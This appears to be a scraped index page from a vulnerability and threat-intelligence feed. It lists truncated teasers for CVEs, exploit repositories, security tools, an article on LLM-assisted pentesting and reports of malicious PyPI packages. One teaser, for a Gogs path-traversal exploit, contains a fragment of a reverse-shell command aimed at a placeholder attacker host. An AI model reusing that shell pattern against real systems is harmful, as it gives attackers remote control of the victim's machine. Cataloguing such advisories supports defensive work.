PT-2026-32896

Name of the Vulnerable Software and Affected Versions DRC Central Office Services COS affected versions not specified Description An unauthenticated configuration file modification issue allows an attacker to modify the server configuration file. This could lead to mass data exfiltration, malicio...

Bluetooth-app

Bluetooth Security Testing App A Kivy-based Android applicati...

Vulnerability Assessment vs Penetration Testing: What Security Leaders Need to Know

Your organization runs quarterly vulnerability scans. You get a report with hundreds, sometimes thousands, of findings. Your team patches what they can and moves on. Six months later, you bring in a penetration testing firm, and they walk right through your defenses using a chain of...

xss_hunter.py

EnterXSS Fuzzer – Automated Cross-Site Scripting Detection...

CVE-2026-6179

CVE-2026-6179 concerns a stored cross-site scripting (XSS) vulnerability in NightWolf Penetration Testing Platform. The affected entry states that an attacker can trigger and run malicious script in a user’s browser due to a stored XSS flaw, enabling impact on user-side confidentiality and integr...

Towards Automated Pentesting with Large Language Models

Large Language Models LLMs are redefining offensive cybersecurity by allowing the generation of harmful machine code with minimal human intervention. While attackers take advantage of dark LLMs such as XXXGPT and WolfGPT to produce malicious code, ethical hackers can follow similar approaches to...

NightWolf Penetration Testing Platform 安全漏洞

NightWolf Penetration Testing Platform is an open-source cybersecurity testing tool developed by NightWolf. It is designed specifically for red teams and penetration testers, used for vulnerability exploitation, privilege escalation, and lateral movement testing. The NightWolf Penetration Testing...

Exploit for CVE-2020-24586

Fracture FragAttacks WiFi Penetration Framework CVE-202...

patchbot

patchbot patchbot is an AI-assisted security reviewer for p...

Exploit for Deserialization of Untrusted Data in Facebook React

R2SAE - React2Shell Auto-Exploit A Firefox extension...

pentest-autopilot-mcps

Pentest Autopilot MCP Servers Professional-grade Model Contex...

Exploit for Path Traversal in Gogs

CVE-2025-8110 — Gogs & /dev/tcp/ATTACKER/4444 0&1"' Cleanu...

GHSA-HR2V-4R36-88HR vulnerabilities

Vulnerabilities for packages: pluto, helm-set-status, cilium-cli, zot, kubescape, tw, consul-k8s, teleport, cluster-api-helm-controller, k9s, trivy-operator, nova, cerbos, cert-manager-cmctl, kuma, trivy, flux, kots, envoy-gateway, k8ssandra-client, helm-docs, linkerd2, tigera-operator, istio,...

CVE-2026-35206 vulnerabilities

Vulnerabilities for packages: pluto, helm-set-status, cilium-cli, zot, kubescape, tw, consul-k8s, teleport, cluster-api-helm-controller, k9s, trivy-operator, nova, cerbos, cert-manager-cmctl, kuma, trivy, flux, kots, envoy-gateway, k8ssandra-client, helm-docs, linkerd2, tigera-operator, istio,...

GHSA-HR2V-4R36-88HR vulnerabilities

Vulnerabilities for packages: trivy-operator, cilium-cli, kots, kube-arangodb, flux-source-controller, chaos-mesh, linkerd2-fips, teleport, chaos-mesh-fips, helm-diff-fips, gitlab-operator-fips, helm-exporter-fips, pluto-fips, helm-exporter, flux, tigera-operator-fips, zarf, cloudbeat, flux-fips,...

Malicious code in gd-auth-sso (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8f23b8545f85df66640646272b028ab4db1032fcb4fd5bbd745971b3438cc4f1 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...

MAL-2026-2536 Malicious code in yhaplo1 (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 ea4e6c1525395c0b55d0de437d61b31250561c4901199518e13cd28fe15f232f Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...

Malicious code in bonsaitree1 (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 0c35db41a5cf0a0671b33adf698777ebb63055a4f5ab3076bf3ed563a875cbb6 Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...

MAL-2026-2533 Malicious code in phasedibd (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 8d514af72edb0054d9c5ff73f59a8517927dc660a5a58c8a03baf8abc5b22365 Dependency confusion attempt. The user identifies themselves as a HackerOne user abusing the PyPI for the purpose of a bug bounty program. This package did not...

Malicious code in noonhelpers (PyPI)

--- -= Per source details. Do not edit below this line.=- Source: kam193 c2cb54ce39fd435f904d72dbbb5eef46166291adcd5106ea8d74d3c3c66aa3a5 Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose. --- Category: PROBABLYPENTES...